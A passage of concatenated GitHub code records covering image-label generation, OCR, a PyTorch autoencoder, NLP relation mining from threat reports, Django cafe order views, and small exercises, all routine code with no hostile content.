MaskRCNN model -> {cfg if isinstance(cfg, str) else self.cfg.MODEL.WEIGHTS}\")\n\n # Set the batch size for processing images, defaulting to 32 if not provided\n self.batch_size = batch_size if batch_size else 32\n\n # Set the number of worker processes for data loading, defaulting to the number of CPU cores\n self.workers = workers if workers is not None else 0\n\n # Build the Mask R-CNN model\n self.model = build_model(self.cfg)\n\n # Set the model to evaluation mode\n self.model.eval()\n\n # Load the pre-trained weights for the model\n checkpointer = DetectionCheckpointer(self.model)\n checkpointer.load(self.cfg.MODEL.WEIGHTS)\n\n # Define the augmentation transform for resizing images\n self.aug = T.ResizeShortestEdge(\n [self.cfg.INPUT.MIN_SIZE_TEST, self.cfg.INPUT.MIN_SIZE_TEST],\n self.cfg.INPUT.MAX_SIZE_TEST\n )\n\n # Set the input image format to RGB or BGR based on the configuration\n self.input_format = self.cfg.INPUT.FORMAT\n assert self.input_format in [\"RGB\", \"BGR\"], self.input_format\n\n def __collate(self, batch):\n \"\"\"\n Collates a batch of images and their paths for use in data loading.\n\n Args:\n batch (list): A list of tuples containing image paths and corresponding images.\n\n Returns:\n tuple: A tuple containing two lists: the paths of the images and the processed data.\n\n \"\"\"\n paths, data = [], []\n for path, image in batch:\n if self.input_format == \"RGB\":\n # Convert image format from RGB to BGR if required by the model\n image = image[:, :, ::-1]\n height, width = image.shape[:2]\n\n # Apply augmentation and transformation to the image\n image = self.aug.get_transform(image).apply_image(image)\n image = image.astype(\"float32\").transpose(2, 0, 1)\n image = torch.as_tensor(image)\n data.append({\"image\": image, \"height\": height, \"width\": width})\n paths.append(path)\n return paths, data\n\n def __call__(self, imagery: List[Path] or List[str], dataset_dir: List[Path] or List[str],\n is_overwrite: bool = False, verbose: bool = False):\n \"\"\"\n Perform the batch processing of imagery to generate and save mask files.\n\n Args:\n imagery (List[Path] or List[str]): A list of image paths or image filenames.\n dataset_dir (List[Path] or List[str]): A list of dataset directories.\n is_overwrite (bool, optional): Whether to overwrite existing mask files. Defaults to False.\n verbose (bool, optional): Whether to print verbose information. Defaults to False.\n\n \"\"\"\n assert len(imagery) > 0, \"No images found in imagery.\"\n\n if not is_overwrite:\n # Skip existing images if overwrite is disabled\n imagery = skip_existing(True, imagery, dataset_dir)\n\n # Create an instance of the ImageDataset class\n dataset = ImageDataset(imagery)\n\n # Create a data loader for batch processing\n loader = DataLoader(\n dataset,\n self.batch_size,\n shuffle=False,\n num_workers=self.workers,\n collate_fn=self.__collate,\n pin_memory=True\n )\n\n total_batches = len(loader)\n progress_bar = tqdm.tqdm(total=total_batches, desc=\"Processing\", unit=\"batch\")\n\n with torch.no_grad():\n for paths, batch in loader:\n # Get the paths and file paths for saving the mask files\n relative_paths, pifpaf_file_paths = get_label_paths(is_mask=False, img_paths=paths,\n dataset_dir=dataset_dir)\n\n assert all(os.path.exists(path) for path in\n pifpaf_file_paths), \"Some PiPaf Label File ('.confidence_fields.npy') does not exist!\"\n\n # Filter the predictions using the mask files\n pifpaf_filtered: List[np.ndarray] = self.__filter_pifpaf_with_mask(batch, pifpaf_file_paths)\n\n # Get the file paths for saving the mask files\n _, mask_file_paths = get_label_paths(is_mask=True, img_paths=paths, dataset_dir=dataset_dir)\n\n # Save the filtered mask files\n save_files(pifpaf_filtered, mask_file_paths, verbose)\n\n progress_bar.update(1)\n\n progress_bar.close()\n\n def __filter_pifpaf_with_mask(self, batch,\n pifpaf_file_paths: List[Path] or List[str]):\n \"\"\"\n Filter PifPaf predictions using segmentation masks.\n\n Args:\n paths (List[Path] or List[str]): List of image paths or filenames.\n batch: Batch data containing images.\n pifpaf_file_paths (List[Path] or List[str]): List of PifPaf label file paths.\n\n Returns:\n List[np.ndarray]: Filtered PifPaf arrays.\n\n \"\"\"\n\n # Order the bounding boxes by distance from the center of the image(default)\n def order_bbox(image_size, bbox_list, only_horizontal=False, only_vertical=False):\n distances = []\n image_height, image_width = image_size\n center_x = image_width // 2\n center_y = image_height // 2\n\n for i, bbox in enumerate(bbox_list):\n x1, y1, x2, y2 = bbox\n bbox_center_x = (x1 + x2) // 2\n bbox_center_y = (y1 + y2) // 2\n distance = bbox_center_x if only_horizontal else bbox_center_y if only_vertical else np.sqrt(\n (bbox_center_x - center_x) ** 2 + (bbox_center_y - center_y) ** 2)\n distances.append((i, distance))\n distances = sorted(distances, key=lambda x: x[1])\n return distances\n\n # Filter segmentations masks based on class and distance from the center of the image\n def filter_masks(results):\n image_size = results[0][\"instances\"].image_size\n pred_boxes, scores, pred_classes, pred_masks = results[0][\"instances\"].get_fields().values()\n if len(pred_masks) == 0:\n raise Exception(\"Error: Pifpaf model did not return any masks!\")\n\n # Filter out all masks that are not person\n filtered_boxes, filtered_masks = zip(\n *[(box.cpu().numpy(), mask.cpu().numpy()) for box, mask, cls in\n zip(pred_boxes, pred_masks, pred_classes) if cls == 0])\n\n # Order the masks by bbox distance to the center of the image\n distances = order_bbox(image_size, filtered_boxes)\n filtered_masks = [filtered_masks[i] for i, _ in distances]\n\n return filtered_masks\n\n # Filter PifPaf array using segmentation mask\n def filter_pifpaf_with_mask(pifpaf_array, mask, is_resize_pifpaf=False, interpolation=cv2.INTER_CUBIC):\n if is_resize_pifpaf:\n # Resize the PifPaf array to match the size of the mask\n pifpaf_resized = np.transpose(pifpaf_array, (1, 2, 0))\n pifpaf_resized = cv2.resize(pifpaf_resized, dsize=(mask.shape[1], mask.shape[0]),\n interpolation=interpolation)\n pifpaf_resized = np.transpose(pifpaf_resized, (2, 0, 1))\n\n # Filter the PifPaf array using the segmentation mask\n filtered_pifpaf = mask * pifpaf_resized\n filtered_pifpaf = np.array(\n [cv2.resize(slice, (9, 17), interpolation=cv2.INTER_CUBIC) for slice in filtered_pifpaf])\n\n return filtered_pifpaf\n # Resize the mask to match the size of the PifPaf array\n mask_resized = cv2.resize(mask.astype(np.uint8), (pifpaf_array.shape[2], pifpaf_array.shape[1]))\n filtered_pifpaf = mask_resized * pifpaf_array\n return filtered_pifpaf\n\n # Get the masks from the PifPaf predictions\n masks = filter_masks(self.model(batch))\n\n # Load the PifPaf label arrays\n pifpaf_labels = [np.load(pifpaf_file_path) for pifpaf_file_path in pifpaf_file_paths]\n\n # Filter the PifPaf arrays using the masks\n pifpaf_filtered = [filter_pifpaf_with_mask(pifpaf_label, mask) for pifpaf_label, mask in\n zip(pifpaf_labels, masks)]\n\n return pifpaf_filtered\n\n\ndef main():\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument('-s', '--source', type=str, required=True,\n help='Source dataset containing image files')\n parser.add_argument('--maskrcnn-cfg-file', type=str, default=\"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\",\n help='Configuration file for the Mask R-CNN model')\n parser.add_argument('--pifpaf-model-name', type=str, default=\"shufflenetv2k16\",\n help='Name of the PifPaf model')\n parser.add_argument('-b', '--batch-size', type=int,\n help='Batch size for processing images')\n parser.add_argument('--num-workers', type=int,\n help='Number of worker processes for data loading')\n args = parser.parse_args()\n\n # Get image paths\n img_paths = get_image_paths(args.source)\n\n # Perform PifPaf processing\n pifpaf_model = BatchPifPaf(model_name=args.pifpaf_model_name,\n batch_size=args.batch_size,\n workers=args.num_workers)\n pifpaf_model(imagery=img_paths, dataset_dir=args.source, is_overwrite=False)\n\n # Perform Mask R-CNN processing\n mask_model = BatchMask(cfg=args.maskrcnn_cfg_file,\n batch_size=args.batch_size,\n workers=args.num_workers)\n mask_model(imagery=img_paths, dataset_dir=args.source, is_overwrite=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"VlSomers/bpbreid","sub_path":"scripts/get_labels.py","file_name":"get_labels.py","file_ext":"py","file_size_in_byte":21391,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"57"} +{"seq_id":"30852160123","text":"# Q.43 A sparse matrix has many zero elements. \r\n# For example, the following 4x4 matrix is a sparse Matrix. \r\n# Conventional method of representation of such a matrix is not space efficient. \r\n# It will be prudent to store non-zero elements only. \r\n# If this is done, then the matrix may be thought of as an ordered list of non-zero elements. \r\n# Information about non-zero elements have three parts. Row, Column and its value.\r\n# Examples:\r\n# Input:\r\n# 1 0 0 0\r\n# 0 5 0 2\r\n# 3 0 0 0\r\n# 0 0 4 0\r\n# Output:\r\n# row\tcolumn\tvalue\r\n# 0\t 0\t 1 \r\n# 1\t 1\t 5\r\n# 1\t 3\t 2\r\n# 2 0\t 3\r\n# 3\t 2 \t 4 \r\n# Input:\r\n# 1 0 0\r\n# 0 5 0\r\n# 0 0 0\r\n# 0 0 6\r\n# Output:\r\n# row\tcolumn\tvalue\r\n# 0\t 0\t 1 \r\n# 1\t 1\t 5\r\n# 3\t 2\t 6\r\n# note: you may assume row and column index starting from 0,0.\r\n\r\nmatrix = []\r\nprint('Enter list (one element at a time)')\r\nwhile True:\r\n row = input(\"-> \")\r\n if not row: break\r\n matrix.append(list(map(int, row.split())))\r\nprint('row','| column','| value')\r\n\r\nfor i in range(len(matrix)):\r\n for j in range(len(matrix[0])):\r\n if matrix[i][j]:\r\n print(i,j,matrix[i][j],sep=' ')","repo_name":"k-e-s-h-a-v/albanero-hackweek","sub_path":"Day-5/Q43.py","file_name":"Q43.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"1501093987","text":"#!/usr/bin python3\n\nfrom PIL import Image\n\n# https://github.com/madmaze/pytesseract\n# https://github.com/tesseract-ocr/tesseract\n# https://pypi.org/project/pytesseract/\nimport pytesseract\nimport sys\nfrom plyer import notification\n\n\ndef write_file(src, text):\n with open(src, \"w\") as f:\n f.write(text)\n\n\ndef extract_text_from_image(src):\n try:\n text = pytesseract.image_to_string(Image.open(src), lang=\"eng\")\n write_file(\"./output.txt\", text)\n\n notification.notify(\n title=\"Finished executing \" + sys.argv[0],\n message=\"Successful, See ./output.txt\",\n )\n except Exception as e:\n notification.notify(\n title=\"Finished executing \" + sys.argv[0],\n message=\"Failed\",\n )\n raise e\n\n\ndef main(argv=sys.argv[1:]):\n src = argv[0]\n extract_text_from_image(src)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"krmmzs/scripts","sub_path":"myscripts/Extract_Text_from_Image.py","file_name":"Extract_Text_from_Image.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"6170872124","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@Project :DGTD_LSTM \n@File :autoencoder_dfnn.py\n@Date :3/28/2022 7:59 PM\n\"\"\"\nimport torch\nimport torch.nn as nn\n\n\nclass AutoencoderCnn(nn.Module):\n \"\"\"\n AutoencoderCnn net model\n \"\"\"\n\n def __init__(self, n, statistics):\n super(AutoencoderCnn, self).__init__()\n self.statistics = statistics\n self.encoder = nn.Sequential(\n # (16, 16, 1) ---> (16, 16, 8)\n nn.Conv2d(in_channels=1, out_channels=8, kernel_size=(5, 5), padding=2, stride=1),\n nn.BatchNorm2d(8),\n nn.ELU(),\n # (16, 16, 8) ---> (8, 8, 16)\n nn.Conv2d(in_channels=8, out_channels=16, kernel_size=(5, 5), padding=2, stride=2),\n nn.BatchNorm2d(16),\n nn.ELU(),\n # (8, 8, 16) ---> (4, 4, 32)\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=(5, 5), padding=2, stride=2),\n nn.BatchNorm2d(32),\n nn.ELU(),\n # (4, 4, 32) ---> (2, 2, 64)\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=(5, 5), padding=2, stride=2),\n nn.BatchNorm2d(64),\n nn.ELU(),\n # (2, 2, 64) --->N_h\n nn.Flatten(),\n nn.Linear(256, 256),\n nn.ELU(),\n nn.Linear(256, 256),\n nn.ELU(),\n # 256 ---> n\n nn.Linear(256, n),\n nn.Sigmoid()\n )\n self.decoder = nn.Sequential(\n # 2 ---> 256\n nn.Linear(n, 256),\n nn.ELU(),\n nn.Linear(256, 256),\n nn.ELU(),\n nn.Linear(256, 256),\n nn.ELU(),\n # 256 ---> (2, 2, 64)\n nn.Unflatten(1, (64, 2, 2)),\n # (2, 2, 64) ---> (4, 4, 64) // 2p = s+1\n nn.ConvTranspose2d(in_channels=64, out_channels=64, kernel_size=(5, 5), padding=1, stride=1),\n nn.BatchNorm2d(64),\n nn.ELU(),\n # (4, 4, 64) ---> (8, 8, 32) // 3(s-1) = 2p\n nn.ConvTranspose2d(in_channels=64, out_channels=32, kernel_size=(5, 5), padding=0, stride=1),\n nn.BatchNorm2d(32),\n nn.ELU(),\n # (8, 8, 32) ---> (16, 16, 16) // 7s-2p=11\n nn.ConvTranspose2d(in_channels=32, out_channels=16, kernel_size=(5, 5), padding=5, stride=3),\n nn.BatchNorm2d(16),\n nn.ELU(),\n # (16, 16, 16) ---> (16, 16, 8) // 15s-2p=11\n nn.ConvTranspose2d(in_channels=16, out_channels=8, kernel_size=(5, 5), padding=2, stride=1),\n nn.BatchNorm2d(8),\n nn.ELU(),\n # nn.Dropout2d(p=0.2),\n # (16, 16, 8) ---> (16, 16, 1) // 15s-2p=11\n nn.ConvTranspose2d(in_channels=8, out_channels=1, kernel_size=(5, 5), padding=2, stride=1),\n nn.BatchNorm2d(1),\n nn.Sigmoid()\n )\n\n def forward(self, _x: torch.Tensor, type: int):\n \"\"\"\n :param _x:\n :param type:\n 0 train autoencoder\n 1 get dfnn label\n 2 get res\n :return:\n \"\"\"\n if type == 0:\n return self.decoder(self.encoder(_x))\n elif type == 1:\n return self.encoder(_x)\n else:\n return self.decoder(_x)\n\n\nclass Dfnn(nn.Module):\n \"\"\" Deep Forward nn\n \"\"\"\n def __init__(self, n):\n super(Dfnn, self).__init__()\n self.dfnn = nn.Sequential(\n nn.Linear(2, 64),\n nn.ReLU(),\n nn.Linear(64, 256),\n nn.ReLU(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Linear(256, 64),\n nn.ReLU(),\n nn.Linear(64, n),\n nn.Sigmoid()\n )\n\n def forward(self, _x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n :param _x:\n :return:\n \"\"\"\n return self.dfnn(_x)\n","repo_name":"Xiang3999/DGTD_LSTM","sub_path":"Net/autoencoder_dfnn.py","file_name":"autoencoder_dfnn.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"16507724493","text":"import re\n\nimport nltk\nimport helper\nfrom nltk.corpus import stopwords\nfrom pycorenlp import StanfordCoreNLP\nimport json\n\nclass relation_miner():\n def __init__(self, stanfordCoreNLP):\n self.stanfordCoreNLP = stanfordCoreNLP\n\n def getProperText(self, text):\n pattern = re.compile(r'\\b(' + r'|'.join(stopwords.words('english')) + r')\\b\\s*')\n text = pattern.sub('', text)\n # print(text)\n return text\n\n def depparse(self, text):\n output = self.stanfordCoreNLP.annotate(text, properties={\n 'annotators': 'depparse',\n 'outputFormat': 'json'\n })\n\n parsed = []\n for i in output[\"sentences\"]:\n current_parsed = []\n # for j in i[\"basicDependencies\"]:\n for j in i[\"enhancedPlusPlusDependencies\"]:\n # exm: 1st sentence> [('ROOT', 'ROOT', 'eat'), ('nsubj', 'eat', 'I'), ('dobj', 'eat', 'chicken'), ('punct', 'eat', '.')]\n # 2nd sentence> [('ROOT', 'ROOT', 'love'), ('nsubj', 'love', 'I'), ('dobj', 'love', 'chicken'), ('punct', 'love', '.')]\n current_parsed.append(tuple((j['dep'], j['governorGloss'], j['dependentGloss'])))\n # parsed example:\n # [\n # [('ROOT', 'ROOT', 'eat'), ('nsubj', 'eat', 'I'), ('dobj', 'eat', 'chicken'), ('punct', 'eat', '.')],\n # [('ROOT', 'ROOT', 'love'), ('nsubj', 'love', 'I'), ('dobj', 'love', 'chicken'), ('punct', 'love', '.')]\n # ]\n parsed.append(current_parsed)\n return parsed\n\n def get_important_relations(self, dep_tree, sentence):\n extracted_words = dict()\n what_bagofwords = set()\n where_bagofwords = set()\n where_attribute_bagofwords = set()\n how_bagofwords = set()\n why_bagofwords = set()\n when_bagofwords = set()\n subject_bagofwords = set()\n action_bagofwords = set()\n\n for node in dep_tree[0]:\n # print(node)\n self.get_relation(node, 'dobj', what_bagofwords, where_bagofwords)\n # if node[0] == 'dobj':\n # action_bagofwords.add(verb+\" \"+obj)\n\n self.get_relation(node, 'nsubj',\n what_bagofwords,\n subject_bagofwords)\n\n self.get_relation(node, 'nmod:on',\n what_bagofwords,\n where_attribute_bagofwords)\n\n self.get_relation(node, 'nmod:in',\n where_attribute_bagofwords,\n where_attribute_bagofwords)\n\n self.get_relation(node, 'advcl:to',\n what_bagofwords,\n why_bagofwords)\n\n self.get_relation(node, 'compound',\n where_bagofwords,\n where_bagofwords)\n\n self.get_relation(node, 'nsubjpass',\n where_bagofwords,\n where_bagofwords)\n\n self.get_relation(node, 'nmod:agent',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:from',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:to',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:with',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:via',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:over',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:for',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:via',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:through',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:using',\n where_bagofwords,\n where_bagofwords)\n self.get_relation(node, 'nmod:into',\n where_bagofwords,\n where_bagofwords)\n\n # what_bafofwords.append(verb)\n # where_bagofwords.append(obj)\n extracted_words['what'] = helper.remove_stopwords(what_bagofwords)\n extracted_words['where'] = helper.remove_stopwords(where_bagofwords)\n extracted_words['where_attribute'] = helper.remove_stopwords(where_attribute_bagofwords)\n extracted_words['why'] = helper.remove_stopwords(why_bagofwords)\n extracted_words['when'] = helper.remove_stopwords(when_bagofwords)\n extracted_words['how'] = helper.remove_stopwords(how_bagofwords)\n extracted_words['subject'] = helper.remove_stopwords(subject_bagofwords)\n extracted_words['action'] = helper.remove_stopwords(action_bagofwords)\n extracted_words['text'] = sentence\n\n\n return extracted_words\n\n def get_relation(self, node, relation_type, *argv):\n # print(node)\n if node[0] == relation_type:\n k = 1\n for arg in argv:\n # print(arg)\n arg.add(node[k])\n k += 1\n # print(arg)\n # print(node[1], node[2])\n return node[1], node[2]\n\n def list_important_info(self, text):\n\n dep_parse_tree = self.depparse(text)\n # print(dep_parse_tree)\n important_dict = self.get_important_relations(dep_parse_tree, text)\n return important_dict\n\n def all_imp_stuff(self, text):\n ourput_list = list()\n for sent in text:\n print(sent)\n dict_ = self.list_important_info(sent)\n print(dict_)\n ourput_list.append(dict_)\n\n return ourput_list\n\n def get_important_relations_new(self, list_of_tuples, sentence):\n list_of_forest = []\n for tuples in list_of_tuples:\n nodes = {}\n forest = []\n for count1 in tuples:\n print(count1)\n # count1:\n # ('ROOT', 'ROOT', 'eat')\n # ('nsubj', 'eat', 'I')\n # ('dobj', 'eat', 'chicken')\n # ('punct', 'eat', '.')\n rel, parent, child = count1\n # nodes[child]\n # {'Name': 'eat', 'Relationship': 'ROOT'}\n # {'Name': 'I', 'Relationship': 'nsubj'}\n # {'Name': 'chicken', 'Relationship': 'dobj'}\n # {'Name': '.', 'Relationship': 'punct'}\n\n # if rel in ['dobj','amod','compound']:\n # print(count1)\n # nodes[parent] = {'Name': parent, 'Relationship': rel}\n nodes[child] = {'Name': child, 'Relationship': rel}\n\n for count2 in tuples:\n # count2\n # ('ROOT', 'ROOT', 'eat')\n # ('nsubj', 'eat', 'I')\n # ('dobj', 'eat', 'chicken')\n # ('punct', 'eat', '.')\n rel, parent, child = count2\n # node\n # {'Name': 'eat', 'Relationship': 'ROOT'}\n # {'Name': 'I', 'Relationship': 'nsubj'}\n # {'Name': 'chicken', 'Relationship': 'dobj'}\n # {'Name': '.', 'Relationship': 'punct'}\n # if rel in ['dobj', 'amod', 'compound']:\n # print(count2)\n node = nodes[child]\n\n if parent == 'ROOT':\n # {'Name': 'eat', 'Relationship': 'ROOT'}\n forest.append(node)\n else:\n # parent\n # {'Name': 'eat', 'Relationship': 'ROOT'}\n # {'Name': 'eat', 'Relationship': 'ROOT', 'children': [{'Name': 'I', 'Relationship': 'nsubj'}]}\n # {'Name': 'eat', 'Relationship': 'ROOT', 'children': [{'Name': 'I', 'Relationship': 'nsubj'}, {'Name': 'chicken', 'Relationship': 'dobj'}]}\n parent = nodes[parent]\n if not 'children' in parent:\n parent['children'] = []\n children = parent['children']\n children.append(node)\n\n list_of_forest.append(forest)\n\n print('---------------------------------------')\n print(list_of_forest)\n print(list_of_tuples)\n # for relation in dep_tree[0]:\n # if relation[0] == 'dobj':\n #\n # print(relation)\n return\n\ndef test():\n from helper import FileReader\n from helper import StanfordServer\n isFile = True\n isStemmer = False\n isServerRestart = False\n report_name = 'reports/test.txt'\n preprocess_tools = FileReader(report_name)\n text = preprocess_tools.read_file()\n text_list = preprocess_tools.get_sent_tokenize(text)\n stanfordServer = StanfordServer()\n if isServerRestart:\n stanfordServer.startServer()\n stanfordNLP = stanfordServer.get_stanforcorenlp()\n print(text_list)\n # extracted_list = getReportExtraction(isFile, isStemmer, isServerRestart, report_name)\n # print(extracted_list)\n nlp_extract = relation_miner(stanfordNLP)\n extracted_list = nlp_extract.all_imp_stuff(text_list)\n print(extracted_list)\n\ndef tree_example():\n from anytree import Node, RenderTree\n\n udo = Node(name='nsubj')\n marc = Node(name='dobj', parent=udo)\n lian = Node(parent=marc, name='amod')\n dan = Node(parent=udo, name='nmod:for')\n jet = Node(parent=dan, name='nsubj')\n jan = Node(parent=dan, name='compound')\n joe = Node(parent=dan, name='det')\n\n print(udo)\n Node('/Udo')\n print(joe)\n Node('/Udo/Dan/Joe')\n\n for pre, fill, node in RenderTree(udo):\n print(\"%s%s%s\" % (pre, node.name, fill))\n\n print(dan.children)\n (Node('/Udo/Dan/Jet'), Node('/Udo/Dan/Jan'), Node('/Udo/Dan/Joe'))\n\nif __name__=='__main__':\n test()\n\n","repo_name":"KaiLiu-Leo/TTPDrill-0.5","sub_path":"relation_miner.py","file_name":"relation_miner.py","file_ext":"py","file_size_in_byte":10439,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"57"} +{"seq_id":"29906235199","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.http import HttpResponse\nfrom django.utils.http import urlencode\nfrom django.conf import settings\nfrom .models import Product, Order, Product_Order, Receipt\nfrom datetime import datetime, timedelta\n\nclass CartView(View):\n def get(self, request):\n cart_product = request.COOKIES.get('cart')\n cart_list = cart_product.split(',') if cart_product else []\n number_of_product = {}\n\n for key in cart_list:\n if key in number_of_product:\n number_of_product[key] += 1\n else:\n number_of_product[key] = int(1)\n products = []\n\n for key, value in number_of_product.items():\n try:\n product = Product.objects.get(id=int(key))\n if product.discount:\n total_price = float(f'{product.discount_to_price * value:.2f}')\n else:\n total_price = float(f'{product.price * value:.2f}')\n products.append({'product': product, 'quantity': value, 'name': product.name,\n 'price': product.price, 'category': product.category,\n 'discount': product.discount, 'total': product.discount_to_price,\n 'total_price':total_price, 'id':product.id, 'image': product.image_src})\n total_price_sum = sum(product['total_price'] for product in products)\n except Product.DoesNotExist:\n pass\n return render(request, 'cart_page.html', {'products': products, 'total_price_sum': f'{total_price_sum:.2f}'})\n\n\n def post(self, request):\n\n print(*request)\n return redirect('cart.html')\n\nclass ReceiptView(View):\n def get(self, request):\n return render(request, 'inc/receipt.html')\n def post(self, request):\n cart_product = request.COOKIES.get('cart')\n cart_list = cart_product.split(',') if cart_product else []\n number_of_product = {}\n\n for key in cart_list:\n if key in number_of_product:\n number_of_product[key] += 1\n else:\n number_of_product[key] = int(1)\n products = []\n\n for key, value in number_of_product.items():\n product = Product.objects.get(id=int(key))\n if product.discount:\n total_price = round(product.discount_to_price * value, 2)\n else:\n total_price = round(product.price * value, 2)\n products.append({'quantity': value, 'total': product.discount_to_price,\n 'total_price': total_price, 'id': product.id})\n total_price_sum = sum(product['total_price'] for product in products)\n\n order = Order.objects.create(status=Order.OrderStatus.Pending)\n order_id = order.id\n\n for product in products:\n Product_Order.objects.create(product_id=product['id'], order_id=order_id,\n number=product['quantity'], price=total_price_sum)\n\n Receipt.objects.create(order_id=order_id, total_price=total_price_sum, final_price=total_price_sum)\n\n return render(request, 'inc/receipt.html', {'products': products, 'order_id': order_id})\n \n \n\n\n\n\n\nclass RemoveFromCartView(View):\n def post(self, request, product_id):\n cart_items = CartView.get_cart_items(request)\n\n for i, item in enumerate(cart_items):\n if item['id'] == product_id:\n del cart_items[i]\n break\n\n response = HttpResponse()\n response = CartView.set_cart_items(response, cart_items)\n\n return response\n\n","repo_name":"Mohammadhp7878/Cafe_project","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"70794961780","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nclass Exam(models.Model):\n\t\"\"\"Examination model\"\"\"\n\t\n\tclass Meta(object):\n\t\tverbose_name = _(u\"Exam\")\n\t\tverbose_name_plural = _(u\"Exams\")\n\n\tsubject = models.CharField(\n\t\tmax_length=256,\n\t\tblank=False,\n\t\tverbose_name=_(u\"Subject title\")\n\t)\n\n\ttime = models.DateTimeField(\n\t\tverbose_name=_(u\"Date and time\"),\n\t\tblank=False,\n\t\tnull=True\n\t)\n\n\tteacher = models.CharField(\n\t\tmax_length=256,\n\t\tblank=False,\n\t\tverbose_name=_(u\"Teacher\")\n\t)\n\n\tfor_group = models.ForeignKey('Group',\n\t\tverbose_name=_(u\"Group\"),\n\t\tblank=False\n\t)\n\n\tdef __unicode__(self):\n\t\treturn u\"%s - %s (%s)\" % (self.subject, self.for_group.title, self.teacher)\n","repo_name":"landrew31/students-system","sub_path":"students/models/exams.py","file_name":"exams.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30594014401","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def swapPairs(self, head: Optional[ListNode]) -> Optional[ListNode]:\n \n\n dummy=ListNode(0,head)\n prev=dummy\n while prev.next and prev.next.next:\n a,b=prev.next,prev.next.next\n temp= a\n prev.next = b\n a.next,b.next=b.next,a\n prev=temp\n return dummy.next\n","repo_name":"nermeenwageh10/Leetcode-Solutions","sub_path":"Solutions/python3/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":312,"dataset":"github-code","pt":"57"} +{"seq_id":"29220702017","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('signup', views.signupUsers, name='signupusers'),\n path('home', views.home, name='ups-home'),\n path('profile', views.profile, name='ups-profile'),\n path('login', views.loginUsers, name='loginusers'),\n path('package', views.packageList, name='ups-package'),\n path('showpackage', views.onepackage, name='ups-onepackage'),\n path('searchpackage', views.searchPackage, name='search-package'),\n path('searchresult', views.searchResult, name='search-result'),\n path('feedback', views.feedback, name='ups-feedback'),\n path('submitfeedback', views.submitFeedback, name='ups-submitfeedback'),\n path('viewfeedback', views.viewFeedback, name='ups-viewfeedback'),\n path('update', views.update, name='ups-update'),\n path('', views.trackpackage, name = 'ups-track'),\n path('trackresult', views.trackResult, name = 'ups-trackresult'),\n path('calculate', views.calculate, name = 'ups-calculate'),\n path('cost', views.cost, name='ups-cost'),\n]\n","repo_name":"Zheyezainidesuanjizhizhongma/Mini_UPS-Delivery-website","sub_path":"ups_frontend/web-app/ups_front/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"13239212964","text":"### Estructuracion de los datos para entrenamientos en modelos que no son intrinsecamente de series temporales (distintos al Prophet):\nimport os\nimport pandas as pd\nimport numpy as np \n\n#Leo los datos de vehiculos y feriados y los junto\ndatos = pd.read_csv(os.path.join('Datos', 'Insumos_prophet', 'df_prophet_entero.csv'))\nferiados = pd.read_csv(os.path.join('Datos', 'Insumos_prophet', 'feriados.csv'))\ndatos['dia'] = [dia[0:10] for dia in datos['ds']]\ndatos = datos.merge(feriados, how = \"left\", left_on = 'dia', right_on = 'ds')\n\n#Reformateo columnas relacionadas al tiempo\ndatos['ds_x'] = pd.to_datetime(datos['ds_x'])\ndatos['hora'] = datos['ds_x'].dt.hour\ndatos['dia_semana'] = datos['ds_x'].dt.dayofweek\ndatos['mes'] = datos['ds_x'].dt.month\ndatos['anio'] = datos['ds_x'].dt.year\n\n#One hot encoding de las columnas de feriados:\ndatos = datos.drop(['ds_y', 'dia', 'es_semana'], axis = 1)\ndatos['valor'] = ~pd.isna(datos['holiday'])\ndatos = pd.pivot(datos, index = ['ds_x', 'y', 'precipitaciones', 'temperatura', 'es_finde', 'hora', 'dia_semana', 'mes', 'anio'], columns = 'holiday', values = 'valor').reset_index()\ndatos[np.unique(feriados['holiday'])] = datos[np.unique(feriados['holiday'])].fillna(False)\ndatos = datos.loc[:, datos.columns.notna()]\n\n# Cambio el valor de 